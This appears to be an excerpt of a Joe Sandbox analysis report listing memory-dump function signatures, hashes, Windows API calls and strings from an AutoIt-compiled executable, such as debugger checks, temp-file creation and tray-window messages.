                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: a6a256049c5ad0fa3cf9d5953078731d57ffafef3dd47fb20652f891759df739
                                                                                      • Instruction ID: a909011f9f9af8cd0132434bbef4ec07eea8e599ce1ceca54bfc0044e2308511
                                                                                      • Opcode Fuzzy Hash: a6a256049c5ad0fa3cf9d5953078731d57ffafef3dd47fb20652f891759df739
                                                                                      • Instruction Fuzzy Hash: 4401DB7174011467DB05EBD8CA12AFF77A89B13380F144016BD46732C1EA309F18E6B1
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C71DD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: f215da5dcebb08206aefcc5b699c494d0d89c48cc00bb6e93ed10a8b7d4c2ae9
                                                                                      • Instruction ID: b7c0f8a23366056dae8d92393f520ad7501a82104d223cddd2d75025b28c17d7
                                                                                      • Opcode Fuzzy Hash: f215da5dcebb08206aefcc5b699c494d0d89c48cc00bb6e93ed10a8b7d4c2ae9
                                                                                      • Instruction Fuzzy Hash: DEF0A471B5121467DB15E7A8CC62BFF77A8EB13390F080916BD66632C1DA705A08A6A0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: 3, 3, 16, 1
                                                                                      • API String ID: 176396367-3042988571
                                                                                      • Opcode ID: d34cb8de1639c6710f7b9942549407b95c662ffcccb64fe9b05552182405c359
                                                                                      • Instruction ID: 5069212646a858b83c88bd898182126d100ba6eecf2ef0eaaa4e59c55d723dde
                                                                                      • Opcode Fuzzy Hash: d34cb8de1639c6710f7b9942549407b95c662ffcccb64fe9b05552182405c359
                                                                                      • Instruction Fuzzy Hash: CCE061023363201097351279DCC5B7F578DCFCD760B14192BF985C2267EA94DE91A7A0
                                                                                      APIs
                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C70B23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                      • API String ID: 2030045667-4017498283
                                                                                      • Opcode ID: 000a9406c1ed7005cc5e0a7989cf2909fdbd96ff097383e724ca8c9d351e9ce8
                                                                                      • Instruction ID: e27469d67d84821241c09ae12a4a3bf8c846f8d99cb1dae38af7ad51819560fe
                                                                                      • Opcode Fuzzy Hash: 000a9406c1ed7005cc5e0a7989cf2909fdbd96ff097383e724ca8c9d351e9ce8
                                                                                      • Instruction Fuzzy Hash: FDE0D83124431826D21437547C43F897A848F06B25F10043BF758955C38EE1659166E9
                                                                                      APIs
                                                                                        • Part of subcall function 00C2F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C30D71,?,?,?,00C1100A), ref: 00C2F7CE
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C30D75
                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C30D84
                                                                                      Strings
                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C30D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                      • API String ID: 55579361-631824599
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C8302F
                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C83044
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Temp$FileNamePath
                                                                                      • String ID: aut
                                                                                      • API String ID: 3285503233-3010740371
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: %.3d$X64
                                                                                      • API String ID: 481472006-1077770165
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA236C
                                                                                      • PostMessageW.USER32(00000000), ref: 00CA2373
                                                                                        • Part of subcall function 00C7E97B: Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA232C
                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CA233F
                                                                                        • Part of subcall function 00C7E97B: Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C4BE93
                                                                                      • GetLastError.KERNEL32 ref: 00C4BEA1
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4BEFC
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1717984340-0